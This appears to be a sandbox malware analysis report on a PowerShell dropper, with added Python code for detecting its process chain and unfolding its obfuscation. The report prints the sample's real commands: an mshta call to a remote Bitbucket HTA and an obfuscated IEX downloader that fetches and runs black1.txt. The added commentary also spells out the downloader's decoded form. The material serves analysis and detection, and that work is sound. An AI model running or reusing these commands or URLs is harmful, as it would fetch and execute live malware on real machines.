Analysis

  • max time kernel
    43s
  • max time network
    104s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    30-09-2022 23:48

General

  • Target

    code.ps1

  • Size

    138B

  • MD5

    efa136867081936967a0ac27271b2fda

  • SHA1

    756f0d9e09882c8531618458e5d582fd5b46fbad

  • SHA256

    e4cda1631a3df7932fb319567b2696e096d1f59f66a6d1611436217943bd692e

  • SHA512

    77e76132c86321792cb621cc9c9f298b59a6ee813553fb2199a1ea82c60549c95c38ed0574c25b40faecfcccdd7931134fae8817fa8ac30c0eb405e4a2eed711

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
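The "Process spawned unexpected child process", "Blocklisted process makes network request" and "Legitimate hosting services abused" signatures above all fire on the same chain: powershell.exe runs cmd.exe, which uses `start /min` to launch mshta.exe against an HTTPS URL on bitbucket.org. The following is an added example, not part of the report or of the sandbox's own signature logic, showing how those three signals can be reproduced as detection logic over process-creation events. The events are constructed to mirror the process tree in this report (the PIDs and command lines are taken from it; the explorer.exe root, the benign mshta.exe control and the list of public hosting domains are assumptions):

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events mirroring the report's tree. PIDs 2016/628/956
# and their command lines come from the report; explorer.exe (1000) as the root and
# the benign mshta.exe (3000) launching a local .hta are made up as a control case.
EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2016, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1"),
    ProcEvent(628, 2016, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c start /min mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt'),
    ProcEvent(956, 628, r"C:\Windows\system32\mshta.exe",
              "mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt"),
    ProcEvent(3000, 1000, r"C:\Windows\system32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# -ExecutionPolicy, -Exec and -ep are all accepted by powershell.exe.
EXEC_POLICY_RE = re.compile(r"-e(?:xecutionpolicy|xec|p)\s+bypass", re.I)
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Illustrative (assumed) list of public code/paste hosts commonly used to stage payloads.
PUBLIC_HOSTING = {"bitbucket.org", "github.com", "raw.githubusercontent.com",
                  "gist.github.com", "pastebin.com"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerating either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Parent chain for pid, nearest parent first, excluding pid itself."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], {pid}
    cur = by_pid.get(pid)
    while cur and cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def detect(events):
    """Return {pid: [reasons]} for processes matching the report's three signatures."""
    findings = {}

    def hit(pid, reason):
        findings.setdefault(pid, []).append(reason)

    for e in events:
        name = image_name(e.image)
        urls = URL_RE.findall(e.cmdline)
        parent_names = [image_name(a.image) for a in ancestors(events, e.pid)]
        # Blocklisted process makes network request: mshta.exe given a remote HTA.
        if name == "mshta.exe" and urls:
            hit(e.pid, "mshta.exe executing a remote HTA: " + urls[0])
            # Legitimate hosting services abused: the staging host is a public code host.
            for host in {urlparse(u).hostname for u in urls}:
                if host and host.lower() in PUBLIC_HOSTING:
                    hit(e.pid, "payload staged on public hosting service: " + host)
        # Process spawned unexpected child process: a script host under powershell.exe.
        if name in SCRIPT_HOSTS and name != "powershell.exe" and "powershell.exe" in parent_names:
            hit(e.pid, f"{name} spawned under powershell.exe (chain: "
                       + " <- ".join(parent_names) + ")")
        # Weak on its own, but it is how the sample was launched here.
        if name == "powershell.exe" and EXEC_POLICY_RE.search(e.cmdline):
            hit(e.pid, "powershell.exe started with -ExecutionPolicy bypass (low signal alone)")
    return findings


if __name__ == "__main__":
    for pid, reasons in sorted(detect(EVENTS).items()):
        for r in reasons:
            print(f"PID {pid}: {r}")
```

Run against the constructed events, cmd.exe (628) is flagged once for its powershell.exe parent, mshta.exe (956) three times (remote HTA, bitbucket.org staging, powershell.exe ancestry), and the benign mshta.exe launching a local .hta is not flagged at all, which is the distinction that keeps the rule usable on hosts where HTAs are legitimately installed.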

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /min mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\system32\mshta.exe
        mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        PID:956
  • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
    POWERSHELL $HPJSWDLAZGWFDZYDFHWGFRU = '[%9%{!)<60%7]643]%((!^]y%9%{!)<60%7]643]%((!^]t\+!{{@901}8-#+([)]#/=}&{0}#23{1=##<%9-+90*4+.IO.%9%{!)<60%7]643]%((!^]t{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6&{0}#23{1=##<%9-+90*4+{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6d\+!{{@901}8-#+([)]#/=}{)]<5/]9928(@-%*})\<$@]'.Replace('%9%{!)<60%7]643]%((!^]','S').Replace('\+!{{@901}8-#+([)]#/=}','E').Replace('{)]<5/]9928(@-%*})\<$@','R').Replace('_#=#9)<+/&53\+]}70#-*6','A').Replace('&{0}#23{1=##<%9-+90*4+','M');$HFVVYPXEVBJEIVAVHEPLSDU = ($HPJSWDLAZGWFDZYDFHWGFRU -Join '')|&('I'+'EX');$HKLNYCJAXBTERCXRLWVDDRR = '[$0[-_<#)(+}%]\3%7\(5&#y$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[+&=#*$)4$<3}!1<)@3##5=m.N+&=#*$)4$<3}!1<)@3##5=*^(!+72@//61)!18$/<%8[.W+&=#*$)4$<3}!1<)@3##5=bR+&=#*$)4$<3}!1<)@3##5=qu+&=#*$)4$<3}!1<)@3##5=$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[]'.Replace('$0[-_<#)(+}%]\3%7\(5&#','S').Replace('+&=#*$)4$<3}!1<)@3##5=','E').Replace('*^(!+72@//61)!18$/<%8[','T');$HHKOVSNBTTKFPLKUTNGTEHB = ($HKLNYCJAXBTERCXRLWVDDRR -Join '')|&('I'+'EX');$HTZCELDOJQNRIVJVBXAVZND = '\][0{2=!#**(#<)4$/{=^%r11+[/-}*(1}3(}]+(#)6[]a<!=7!}\7)9&$[[)/4/&[/&11+[/-}*(1}3(}]+(#)6[]'.Replace('\][0{2=!#**(#<)4$/{=^%','C').Replace('11+[/-}*(1}3(}]+(#)6[]','E').Replace('<!=7!}\7)9&$[[)/4/&[/&','T');$HJJPDTCBEJQGGUGWFGICSKF = '{!@{8=!@4!(52!5=$1_##*&5<22_0_)1\%*#}*(6[867tR&5<22_0_)1\%*#}*(6[867[={9}@&&6*48{8}6_+3%=*pon[={9}@&&6*48{8}6_+3%=*&5<22_0_)1\%*#}*(6[867'.Replace('{!@{8=!@4!(52!5=$1_##*','G').Replace('&5<22_0_)1\%*#}*(6[867','E').Replace('[={9}@&&6*48{8}6_+3%=*','S');$HYRGAIQZLYZNHUPAAKKHBKR = 'G!!((=#^55=^9&7^3$_4=1/t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@pon7({=\[#%*6@0088{}\43}@!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/am'.Replace('7({=\[#%*6@0088{}\43}@','S').Replace('!!((=#^55=^9&7^3$_4=1/','E').Replace('[%\*\][6!)-[8$5!41<#1_','R');$HSIYIVTRGVUTCUUELHVIWZX = 
'}2=29-^$/4!#%4_6^(9<@[&_/2\4*4=(\7_]}](4_\_)a^[<2_/^@429<&238}@][#=To&_/2\4*4=(\7_]}](4_\_)n^[<2_/^@429<&238}@][#='.Replace('}2=29-^$/4!#%4_6^(9<@[','R').Replace('&_/2\4*4=(\7_]}](4_\_)','E').Replace('^[<2_/^@429<&238}@][#=','D');&('I'+'EX')($HFVVYPXEVBJEIVAVHEPLSDU::new($HHKOVSNBTTKFPLKUTNGTEHB::$HTZCELDOJQNRIVJVBXAVZND('https://bitbucket.org/!api/2.0/snippets/tinypro/dk958p/b15a5d7c2c03c07fb8aac916623be0799dce12bf/files/black1.txt').$HJJPDTCBEJQGGUGWFGICSKF().$HYRGAIQZLYZNHUPAAKKHBKR()).$HSIYIVTRGVUTCUUELHVIWZX())
    1⤵
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1944
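The second POWERSHELL command line above looks like random noise, but the scheme is simple: each string literal is a real .NET name in which the letters S, E, R, A, M, T, D and G have been swapped for long junk tokens, and a chain of `.Replace('token','letter')` calls restores them at runtime before `&('I'+'EX')` evaluates the result. Folding the chains by hand gives `[System.IO.StreamReader]`, `[System.Net.WebRequest]`, `Create`, `GetResponse`, `GetResponseStream` and `ReadToEnd`, so the whole line reduces to `IEX([System.IO.StreamReader]::new([System.Net.WebRequest]::Create('https://bitbucket.org/.../black1.txt').GetResponse().GetResponseStream()).ReadToEnd())`: a second-stage downloader that fetches black1.txt from the same Bitbucket snippet API and executes it in memory. The following is an added example, not code from the report, that performs that folding statically so nothing from the sample is ever executed. It is run on one fragment copied from the report (the `Create` chain) and on a constructed sample in the same style; the constructed sample and the variable names in it are assumptions:

```python
import re

# PowerShell single-quoted literal; the only escape inside it is a doubled quote.
_STR = r"'((?:[^']|'')*)'"
# One .Replace('old','new') call. PowerShell method names are case-insensitive.
_REPLACE = re.compile(r"\.Replace\(\s*" + _STR + r"\s*,\s*" + _STR + r"\s*\)", re.I)
# A literal followed by one or more chained .Replace() calls.
_CHAIN = re.compile(_STR + r"((?:\.Replace\(\s*" + _STR + r"\s*,\s*" + _STR + r"\s*\))+)", re.I)
# ('I'+'EX')-style concatenation of two literals, used in the sample to hide IEX.
_CONCAT = re.compile(r"\(\s*" + _STR + r"\s*\+\s*" + _STR + r"\s*\)")

# Fragment copied verbatim from the report's POWERSHELL command line (the 'Create' chain).
REPORT_FRAGMENT = r"""$HTZCELDOJQNRIVJVBXAVZND = '\][0{2=!#**(#<)4$/{=^%r11+[/-}*(1}3(}]+(#)6[]a<!=7!}\7)9&$[[)/4/&[/&11+[/-}*(1}3(}]+(#)6[]'.Replace('\][0{2=!#**(#<)4$/{=^%','C').Replace('11+[/-}*(1}3(}]+(#)6[]','E').Replace('<!=7!}\7)9&$[[)/4/&[/&','T')"""

# Constructed sample in the same style (not from the report): hides WebRequest and IEX.
SAMPLE = r"""$w = '[%%y%%t$$m.N$$t.W$$bR$$qu$$%%t]'.Replace('%%','S').Replace('$$','E');&('I'+'EX')($w)"""


def _unquote(s: str) -> str:
    return s.replace("''", "'")


def resolve_chain(literal: str, pairs) -> str:
    """Apply the Replace() calls in source order, exactly as PowerShell would at runtime."""
    s = _unquote(literal)
    for old, new in pairs:
        s = s.replace(_unquote(old), _unquote(new))
    return s


def deobfuscate(script: str):
    """Statically fold every '...'.Replace(...) chain and ('a'+'b') concatenation.

    Returns (rewritten script, list of recovered strings). Nothing is executed.
    """
    recovered = []

    def fold(m):
        value = resolve_chain(m.group(1), _REPLACE.findall(m.group(2)))
        recovered.append(value)
        return "'" + value.replace("'", "''") + "'"

    out = _CHAIN.sub(fold, script)
    out = _CONCAT.sub(lambda m: "'" + _unquote(m.group(1)) + _unquote(m.group(2)) + "'", out)
    return out, recovered


def invokes_expression(script: str) -> bool:
    """True if the folded script still reaches Invoke-Expression / IEX."""
    folded, _ = deobfuscate(script)
    return re.search(r"\b(?:iex|invoke-expression)\b", folded, re.I) is not None


if __name__ == "__main__":
    for name, src in (("report fragment", REPORT_FRAGMENT), ("constructed sample", SAMPLE)):
        folded, strings = deobfuscate(src)
        print(f"{name}: recovered {strings}, IEX={invokes_expression(src)}")
        print("  " + folded)
```

The recovered names keep the mixed case the obfuscator left behind (`CrEaTE`, `[SyStEm.NEt.WEbREquESt]`); that is harmless to PowerShell, which resolves type and method names case-insensitively, and it is a useful fingerprint for this particular builder. The point of folding rather than running is that the first POWERSHELL variable in the report resolves to `[System.IO.StreamReader]` and the last to `ReadToEnd`, which tells you the next stage is fetched over the network before you have had to touch it; the sandbox's own process tree confirms the companion black2.txt URL was reached via mshta.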

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    • Modify Registry (2) T1112
    • Install Root Certificate (1) T1130
  • Command and Control
    • Web Service (1) T1102

Technique IDs are from ATT&CK v6, as the heading states; in current ATT&CK, T1112 and T1102 keep their IDs, while T1130 was folded into T1553.004 (Subvert Trust Controls: Install Root Certificate).

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    6278f56a1a3ea516c5629446f3f0bc6b

    SHA1

    bd2aeb4e3c246d6386cadb098b0e4a0eed6f2503

    SHA256

    3e68c0aeda067470b3dad0aae7433d9744a928b5dc1518a822e169c9673e6107

    SHA512

    2c3d458c7a5def5a9f56c0e9cd228857077e9977da5d69ae2b572526216b088a57b1f35b459337e78756939baa9edcd56e0ee71f448899be89d3518bbbd793ca

  • memory/628-59-0x0000000000000000-mapping.dmp
  • memory/956-60-0x0000000000000000-mapping.dmp
  • memory/1944-65-0x000007FEF2C80000-0x000007FEF36A3000-memory.dmp
    Filesize

    10.1MB

  • memory/1944-71-0x00000000020BB000-0x00000000020DA000-memory.dmp
    Filesize

    124KB

  • memory/1944-70-0x00000000020B4000-0x00000000020B7000-memory.dmp
    Filesize

    12KB

  • memory/1944-69-0x00000000020BB000-0x00000000020DA000-memory.dmp
    Filesize

    124KB

  • memory/1944-68-0x00000000020B4000-0x00000000020B7000-memory.dmp
    Filesize

    12KB

  • memory/1944-67-0x000000001B710000-0x000000001BA0F000-memory.dmp
    Filesize

    3.0MB

  • memory/1944-66-0x000007FEF2060000-0x000007FEF2BBD000-memory.dmp
    Filesize

    11.4MB

  • memory/2016-58-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
    Filesize

    3.0MB

  • memory/2016-62-0x000000000284B000-0x000000000286A000-memory.dmp
    Filesize

    124KB

  • memory/2016-61-0x0000000002844000-0x0000000002847000-memory.dmp
    Filesize

    12KB

  • memory/2016-54-0x000007FEFB731000-0x000007FEFB733000-memory.dmp
    Filesize

    8KB

  • memory/2016-57-0x0000000002844000-0x0000000002847000-memory.dmp
    Filesize

    12KB

  • memory/2016-56-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp
    Filesize

    11.4MB

  • memory/2016-55-0x000007FEF3AA0000-0x000007FEF44C3000-memory.dmp
    Filesize

    10.1MB